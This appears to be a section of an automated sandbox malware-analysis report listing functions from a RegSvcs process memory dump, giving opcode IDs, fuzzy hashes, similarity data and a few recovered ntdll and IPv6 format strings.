                                                          Function 00416CF0 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424e62780f118760851af40ef50adbdd702d523ad0f09e3bc3d3f51464d06dee
                                                          • Instruction ID: cf20660b8262fe95a05727950ab8c5c9831eae06b806050fbc2ec41a12b14a30
                                                          • Opcode Fuzzy Hash: 424e62780f118760851af40ef50adbdd702d523ad0f09e3bc3d3f51464d06dee
                                                          • Instruction Fuzzy Hash: A1A00227F5A0180554245C8D7D410B4F378D1C707AD3033F7DD0CB35001483C52A11DD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01450310 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                          • Instruction ID: b8d6cbdf5cb3bb43f8f7aa3d9ab1581c6bb6123594ebf0a6b138653dc1e901dd
                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                          • Instruction Fuzzy Hash: 16D01236100248EFCB01DF41C890D9A772AFBD8710F148019FD19076118A31ED62DA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01430750 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                          • Instruction ID: 686d793332e1a0551dcc84e1909a974da61c2f7894f285ee3a16c9b0f8f76b71
                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                          • Instruction Fuzzy Hash: 2FC04C757015418FDF15DF1AD294F4977E4F754740F150891E845DB732E634E801CA10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01474340 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e369591f50fb70daa863b65f25335c83807535fd751ad46e85a4d24d570afc9b
                                                          • Instruction ID: 5c550637e67904357587706815e0ec67f029b6d9b8fce437ad71cd598ff54f40
                                                          • Opcode Fuzzy Hash: e369591f50fb70daa863b65f25335c83807535fd751ad46e85a4d24d570afc9b
                                                          • Instruction Fuzzy Hash: D2900231605801129140715848C454A9006A7F0301B95C012E0424559CCB248A565361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01474650 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 523da7797eb14f639dc20340b2c776854c86ceff0991a9c04b7569485ce25ae8
                                                          • Instruction ID: e93a5be2cec05f35873aee2aab421226757968947ccf3e73f9e189c58a6f8603
                                                          • Opcode Fuzzy Hash: 523da7797eb14f639dc20340b2c776854c86ceff0991a9c04b7569485ce25ae8
                                                          • Instruction Fuzzy Hash: 0C9002616015014241407158484440AB006A7F13013D5C116A0554565CC72889559369
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472BE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a582f61324dab2dd54cf92a5b5038c5531253daebee7e6e32796192a6f72791c
                                                          • Instruction ID: e274441f1300ec27acbced2c7bce5da71d6c0cf9a9d330c1d5e9e2deeee80cc3
                                                          • Opcode Fuzzy Hash: a582f61324dab2dd54cf92a5b5038c5531253daebee7e6e32796192a6f72791c
                                                          • Instruction Fuzzy Hash: 4590023120544942D14071584444A4A501697E0305F95C012A0064699DD7358E55B761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472B80 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 659310d323d82a858cf388a3fb34c8b1dd93544968d1d0274ea84c6364247d8f
                                                          • Instruction ID: 17ee876a0505af678eb9ed1078533cd9565682cd004b4d41888d9a60fd27eab3
                                                          • Opcode Fuzzy Hash: 659310d323d82a858cf388a3fb34c8b1dd93544968d1d0274ea84c6364247d8f
                                                          • Instruction Fuzzy Hash: 0390023120140902D1047158484468A500697E0301F95C012A602465AED77589917231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472BA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9ce5802e60ec25432a12385c56ae3ab25b525780a1820b0ce0a2c5c61c3f80
                                                          • Instruction ID: 2df02ae97103833d2159954cdfae94f6ef3e31f5076644a3528384dac5547b76
                                                          • Opcode Fuzzy Hash: eb9ce5802e60ec25432a12385c56ae3ab25b525780a1820b0ce0a2c5c61c3f80
                                                          • Instruction Fuzzy Hash: CA90023160540902D1507158445474A500697E0301F95C012A0024659DC7658B5577A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472AF0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77e8e8f8f372787f897e3879911d6efa4035b7293231966bd5cb49ab54c3a430
                                                          • Instruction ID: c18387b87af4655e6a3a4c01b21c21181239a3ba7969bea47499760f2f056af0
                                                          • Opcode Fuzzy Hash: 77e8e8f8f372787f897e3879911d6efa4035b7293231966bd5cb49ab54c3a430
                                                          • Instruction Fuzzy Hash: 36900225221401020145B558064450F5446A7E63513D5C016F1416595CC73189655321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5971ec58f0e1cc7a8455761a8572bb7c707cfef274954efc547bd657c7ba485d
                                                          • Instruction ID: 59e67b5366300a6ee5db5a65b566212c2c8b1d7a0958fdd4235b278bf4a23652
                                                          • Opcode Fuzzy Hash: 5971ec58f0e1cc7a8455761a8572bb7c707cfef274954efc547bd657c7ba485d
                                                          • Instruction Fuzzy Hash: 2F9002A1201541924500B2588444B0E950697F0301B95C017E1054565CC63589519235
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472D00 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 280b6c87f9a5a6fc69860c375f0afb2a84656d2f7ced1102aa7bd82bf4f19827
                                                          • Instruction ID: 69c7250343288f630476febfc6a04ce09b0ce7583eb9fe687b79632662678f5b
                                                          • Opcode Fuzzy Hash: 280b6c87f9a5a6fc69860c375f0afb2a84656d2f7ced1102aa7bd82bf4f19827
                                                          • Instruction Fuzzy Hash: 2390022120544542D10075585448A0A500697E0305F95D012A106459ADC7358951A231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472DB0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e69be0d003d7397fa1f4562923d715592a3c9f797e5956fd03b56dc004f2887
                                                          • Instruction ID: 679d0a5e23eb3a0fb00898020766afd7f2bc54152d9740fddde541f3593494a0
                                                          • Opcode Fuzzy Hash: 8e69be0d003d7397fa1f4562923d715592a3c9f797e5956fd03b56dc004f2887
                                                          • Instruction Fuzzy Hash: F690023124140502D1417158444460A500AA7E0341FD5C013A0424559EC7658B56AB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472C60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a046589526550101c47cd9220b40cca964036ce304bcddbfd11d4bad38b4db
                                                          • Instruction ID: 35b7c54c73802187eb13aa73c66eeb432a52f3cdf263c8c0cdcae7a2b1cefd02
                                                          • Opcode Fuzzy Hash: 94a046589526550101c47cd9220b40cca964036ce304bcddbfd11d4bad38b4db
                                                          • Instruction Fuzzy Hash: E790023120140942D10071584444B4A500697F0301F95C017A0124659DC725C9517621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ad8fd701df441a180e957952f985ea75cdf7b149ab48aa8f34ef76ce46271a9
                                                          • Instruction ID: 81b3d657223f42bd8620ce6ef9c77ac0029c3b520e67e3d189e7dacd4c3afa0d
                                                          • Opcode Fuzzy Hash: 1ad8fd701df441a180e957952f985ea75cdf7b149ab48aa8f34ef76ce46271a9
                                                          • Instruction Fuzzy Hash: 6190022160540502D1407158545870A501697E0301F95D012A0024559DC7698B5567A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472CF0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f86f84966fe33bfb462ec7588422edf5412c0a17d63d1c0c7e08a4fb0505ecba
                                                          • Instruction ID: 4dab98694d589e0d05352cb11ffd4f126ef370809ef9e298e4dbbb95c117acce
                                                          • Opcode Fuzzy Hash: f86f84966fe33bfb462ec7588422edf5412c0a17d63d1c0c7e08a4fb0505ecba
                                                          • Instruction Fuzzy Hash: 8C90023120140503D1007158554870B500697E0301F95D412A042455DDD76689516221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472F60 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 847389ee58734f9fe8a150f064ba7e84f5d4ff268e84f521330f6b84a6d3167a
                                                          • Instruction ID: eb16943289d8abad90ef2806c6673e96faa1db055e269ec752efda1384215a80
                                                          • Opcode Fuzzy Hash: 847389ee58734f9fe8a150f064ba7e84f5d4ff268e84f521330f6b84a6d3167a
                                                          • Instruction Fuzzy Hash: 9990026121140142D1047158444470A504697F1301F95C013A2154559CC6398D615225
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472FA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b34f0c72d83733f24c5b659af52e7d72a642815e304fe495334bde1ddfb190c
                                                          • Instruction ID: 7766b0e1e3d049771206136139bbdefec19ef4f3093667efd7c3fce1f6e374c8
                                                          • Opcode Fuzzy Hash: 1b34f0c72d83733f24c5b659af52e7d72a642815e304fe495334bde1ddfb190c
                                                          • Instruction Fuzzy Hash: 3890023120180502D1007158484874B500697E0302F95C012A516455AEC775C9916631
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472E30 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8232389217b0e2caf284b6a6eab229106b1440fc5ccc0c61fa528ba80a1dfb54
                                                          • Instruction ID: ad3a4e69c6df13c5ba623c7770fe9b652b856bf8377a17c3abc464fb56e5a953
                                                          • Opcode Fuzzy Hash: 8232389217b0e2caf284b6a6eab229106b1440fc5ccc0c61fa528ba80a1dfb54
                                                          • Instruction Fuzzy Hash: A190022130140502D1027158445460A500AD7E1345FD5C013E142455ADC7358A53A232
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472EE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f55d0c4aab9bb8525d6f8b6f4a6b3e064dba4ae50b5096bee938d82a6375b8d
                                                          • Instruction ID: f8b48db541e110217a186c76cb59ce24ecfcd8dd2339d7cc8483675b3e1a00ec
                                                          • Opcode Fuzzy Hash: 2f55d0c4aab9bb8525d6f8b6f4a6b3e064dba4ae50b5096bee938d82a6375b8d
                                                          • Instruction Fuzzy Hash: 9590026120180503D1407558484460B500697E0302F95C012A206455AECB398D516235
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01473010 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33b23337ab849d46b3179d0211d53de75ec726960e22674ae49dca49d507d934
                                                          • Instruction ID: 0e62ac48ac10531bcf002e60ae5c123cb35f91eddfce1a6e3ca2d8d34dafdfeb
                                                          • Opcode Fuzzy Hash: 33b23337ab849d46b3179d0211d53de75ec726960e22674ae49dca49d507d934
                                                          • Instruction Fuzzy Hash: 2B90022120184542D14072584844B0F910697F1302FD5C01AA4156559CCA2589555721
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01473090 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b511ab8e732195af3d0022fab405a125fb534d530b87d732b5e1eee3b1779a4
                                                          • Instruction ID: d4c749823f0bf1558a786a9bc7ccb91a1ac27249089d3bacb9a34ec627273ab0
                                                          • Opcode Fuzzy Hash: 4b511ab8e732195af3d0022fab405a125fb534d530b87d732b5e1eee3b1779a4
                                                          • Instruction Fuzzy Hash: E290022124140902D1407158845470B5007D7E0701F95C012A0024559DC7268A6567B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014735C0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                          • Instruction ID: 2fe684c59a95232b8fab28181f4f66796a23ded1e89a3efa322ec85a59db2225
                                                          • Opcode Fuzzy Hash: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                          • Instruction Fuzzy Hash: 1C90023160550502D1007158455470A600697E0301FA5C412A042456DDC7A58A5166A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014739B0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7380734c1fc8a2ac82ba59bbb59aed4f1178ce7773207a40d2fb121883212ff
                                                          • Instruction ID: c1725ea45798b717462f4250579655bad541fd16365f62ef766113a3f666c937
                                                          • Opcode Fuzzy Hash: d7380734c1fc8a2ac82ba59bbb59aed4f1178ce7773207a40d2fb121883212ff
                                                          • Instruction Fuzzy Hash: F090022124545202D150715C444461A9006B7F0301F95C022A0814599DC66589556321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01473D70 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 479799c19adab3e3cdf5c5cfd3f6a8604cd4e8d91ce20ab135307f26080157d7
                                                          • Instruction ID: dc5b81326ddc7d67be9fba1e72c289058f090a79bc9cf654eee001c3da66157f
                                                          • Opcode Fuzzy Hash: 479799c19adab3e3cdf5c5cfd3f6a8604cd4e8d91ce20ab135307f26080157d7
                                                          • Instruction Fuzzy Hash: CE90023520140502D5107158584464A504797E0301F95D412A042455DDC76489A1A221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01473D10 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d968efc941bb843a53202798c133adc95b9b8e8e909bd5a96574191338fe083
                                                          • Instruction ID: 84ed8bb23e9358326c80ca3ec79f104bfa63ddd943832c6197faf882b10a8e56
                                                          • Opcode Fuzzy Hash: 9d968efc941bb843a53202798c133adc95b9b8e8e909bd5a96574191338fe083
                                                          • Instruction Fuzzy Hash: 1B90023120240242954072585844A4E910697F1302BD5D416A0015559CCA2489615321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 5fdf393996877f050de0273f8c36f733eb3a45035e5cc764a9ec24594ea31b37
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: fb5cfbd676607eb29bd509e9abb2b7aa9b4429a7938bb11d6c327851be71ac2e
                                                          • Instruction ID: 7f79c82c0874ed2de6ce2855649a18dd3ea8bdc5275de4c1365001f70723bc69
                                                          • Opcode Fuzzy Hash: fb5cfbd676607eb29bd509e9abb2b7aa9b4429a7938bb11d6c327851be71ac2e
                                                          • Instruction Fuzzy Hash: 525106B1B00116AFCB11DF9D88809BFFBB8BB59240B64822BE495D7651D374DE41CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 879f89b06dd60ae6651627fb40c9bd211001e8bf7aeb30812df3d94b43445d27
                                                          • Instruction ID: e2a105272774dab731bb117a1bad8e39f9adaa6e6ab82e4e10e3ad010178941c
                                                          • Opcode Fuzzy Hash: 879f89b06dd60ae6651627fb40c9bd211001e8bf7aeb30812df3d94b43445d27
                                                          • Instruction Fuzzy Hash: B1511471A00645AECB20DF5DC994C7FBBFCEB48201B40882FE496D7661E6F4EA408760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01467630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 014A4655
                                                          • ExecuteOptions, xrefs: 014A46A0
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 014A4725
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 014A4742
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 014A4787
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014A46FC
                                                          • Execute=1, xrefs: 014A4713
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 658b5992820860b1feeb3b6ba08bcabf5d4dda05214f7b35ff18e914790ad044
                                                          • Instruction ID: 0de96d6fb0d394952ee16c22b9c5b633c0496d7919e280cf07e0675c11cafa43
                                                          • Opcode Fuzzy Hash: 658b5992820860b1feeb3b6ba08bcabf5d4dda05214f7b35ff18e914790ad044
                                                          • Instruction Fuzzy Hash: E2514F716002096AEF209BA9DC85FEE77ACEF2431DF1800AFD609972B0D770AE458F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01506940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
